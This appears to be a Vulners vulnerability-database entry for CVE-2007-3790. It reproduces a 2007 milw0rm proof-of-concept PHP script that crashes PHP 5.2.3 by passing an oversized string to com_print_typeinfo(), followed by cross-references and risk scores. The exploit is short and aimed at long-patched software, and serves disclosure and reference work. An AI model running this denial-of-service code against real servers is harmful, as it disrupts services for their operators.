PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2007-3790 | 15 Jul 200723:00 | – | cve | |
| CVE-2007-3790 | 15 Jul 200723:00 | – | cvelist | |
| EUVD-2007-3774 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-3790 | 15 Jul 200723:30 | – | nvd | |
| PHP < 5.2.4 Multiple Vulnerabilities | 17 Aug 202000:00 | – | openvas | |
| PHP < 5.2.4 Multiple Vulnerabilities | 3 Sep 200700:00 | – | nessus | |
| Design/Logic Flaw | 15 Jul 200723:30 | – | prion | |
| CVE-2007-3790 | 30 Oct 201509:20 | – | redhatcve | |
| SUSE CVE-2007-3790 | 15 Feb 202306:11 | – | susecve | |
| CVE-2007-3790 | 15 Jul 200723:30 | – | ubuntucve |
10
<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp sp2, worked both from the cli and on apache
//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}
$buff = str_repeat("a",1000);
com_print_typeinfo($buff);
?>
# milw0rm.com [2007-07-12]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.8
EPSS0.03017